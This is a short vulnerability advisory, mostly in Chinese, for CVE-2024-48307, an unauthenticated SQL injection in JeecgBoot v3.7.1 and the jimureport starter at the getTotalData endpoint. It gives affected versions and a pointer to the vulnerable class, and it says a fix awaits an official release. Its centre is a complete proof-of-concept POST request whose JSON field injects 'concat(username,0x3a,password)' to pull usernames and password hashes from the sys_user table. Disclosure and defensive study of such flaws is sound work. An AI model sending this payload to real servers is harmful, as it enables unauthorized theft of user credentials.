目录导航
漏洞描述
JeecgBoot v3.7.1中的/onlDragDatasetHead/getTotalData组件存在SQL注入漏洞,攻击者可以无需权限利用jimureport-dashboard-spring-boot-starter-1.8.1-beta.jar查询数据库,导致数据库信息泄露。
The /drag/onlDragDatasetHead/getTotalData interface has an unauthorized SQL injection vulnerability.
影响版本
jimureport-spring-boot-starter.version<=1.8.1
JeecgBoot v3.7.1
CVE-2024-48307 POC
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 284
{"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}
漏洞详情
ShiroConfig.java
Code: jimureport-dashboard-spring-boot-starter-1.8.1-beta.jar!/org/jeecg/modules/drag/b/f.class#c
修复措施
等待官方发布新版本。
转载请注明出处及链接